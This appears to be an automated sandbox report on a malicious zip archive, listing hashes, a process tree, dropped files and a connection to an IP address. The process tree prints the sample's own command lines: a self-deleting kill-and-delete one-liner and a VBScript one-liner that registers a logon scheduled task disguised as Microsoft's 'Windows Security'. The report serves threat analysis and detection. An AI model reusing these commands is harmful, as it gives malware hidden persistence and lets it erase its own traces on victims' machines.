Field | Value
---|---
File name | 7484076131.zip
Full analysis | https://app.any.run/tasks/56e52dd3-94d1-4bc8-83f9-3cb684d3712f
Verdict | Malicious activity
Analysis date | May 20, 2022, 17:23:42
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | 
MIME | application/zip
File info | Zip archive data, at least v2.0 to extract
MD5 | A2924CF3292870BD0A63D96F23B77363
SHA1 | 951BF94009AA6C445B2058FE1883130A91623D40
SHA256 | 6CEE72904C3C3EFBD58857E33E18D18E6803F8B421AA8C154B422416BC0C3538
SSDEEP | 3072:5I61FIayiF/JpatqpxKY1VMps27NEqPmY9vYB+06dm561k:i61FIGTake8CfpEqP5U+S61k
Extension | Type
---|---
.zip | ZIP compressed archive (100)

Field | Value
---|---
ZipFileName | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792
ZipUncompressedSize | 234496
ZipCompressedSize | 130869
ZipCRC | 0x3bf9d17b
ZipModifyDate | 1980:00:00 00:00:00
ZipCompression | Deflated
ZipBitFlag | 0x0009
ZipRequiredVersion | 20
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1580 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\7484076131.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | Explorer.EXE |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 | | | | |
268 | "C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe" | C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe | — | Explorer.EXE |
User: admin Integrity Level: MEDIUM Exit code: 4294967295 | | | | |
1760 | "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" | C:\Windows\System32\cmd.exe | — | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
3168 | "C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" | C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe | — | cmd.exe |
User: admin Integrity Level: MEDIUM | | | | |
3348 | "C:\Windows\System32\cmd.exe" /c taskkill /F /PID 268 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe" & exit | C:\Windows\System32\cmd.exe | — | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3556 | taskkill /F /PID 268 | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3712 | powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe') }).Terminate()" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
1232 | "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs & cscript //nologo C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs & del C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs /f /q & exit | C:\Windows\System32\cmd.exe | — | Windows Security.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2028 | cscript //nologo C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3256 | timeout 3 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1580 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb1580.8748\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792 | executable | |
MD5:F53673AEC0316B62EC1960799C371B6F | SHA256:F8F34F31CCB111E148D818E7B5E5C4EA0268D97AF23BCCC6F25A59B3B03A1792 | |||
3712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\lq01kna4.zk1.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\lhcdgcw3.cn3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
268 | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe | C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe | executable | |
MD5:F53673AEC0316B62EC1960799C371B6F | SHA256:F8F34F31CCB111E148D818E7B5E5C4EA0268D97AF23BCCC6F25A59B3B03A1792 | |||
1232 | cmd.exe | C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs | text | |
MD5:38BEE6EF6A8191DD08E6A79320F3D61D | SHA256:1F49C106C9535814D6D97AE50DD54757ACF8DC80D3331553F1DD70B104A21D2D | |||
1988 | powershell.exe | C:\Users\admin\AppData\Local\Temp\usriyqjn.flx.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1988 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pxag0qbb.kkm.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3712 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
3284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mtqmvj5v.spv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\wqo22ebs.t3q.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 193.233.48.87:27941 | — | OOO FREEnet Group | RU | suspicious |
3168 | Windows Security.exe | 193.233.48.87:27941 | — | OOO FREEnet Group | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
dns.msftncsi.com | | shared |